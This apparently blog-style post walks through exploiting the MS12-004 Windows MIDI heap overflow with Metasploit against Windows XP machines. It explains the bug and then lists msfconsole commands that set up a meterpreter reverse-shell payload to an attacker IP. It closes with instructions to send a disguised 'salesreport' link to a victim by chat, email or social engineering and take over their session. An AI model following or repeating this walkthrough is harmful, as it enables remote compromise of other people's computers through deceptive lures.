![=-=>>W3LC[]M3<<=-=](http://3.bp.blogspot.com/-HQcdYiso0K4/UDjeSQBP6mI/AAAAAAAAAEE/1JtAW52i4iU/s1600/2.jpg)
This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Exploit Targets
Windows XP service pack 2
Windows XP service pack 3
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/ms12_004_midi
Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (ms12_004_midi)>set lport 4444 (Port of Local PC)
Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)
Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)
Msf exploit (ms12_004_midi)>exploit
Now an URL you should give to your victim http://192.168.1.4:80/salesreport
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
No comments:
Post a Comment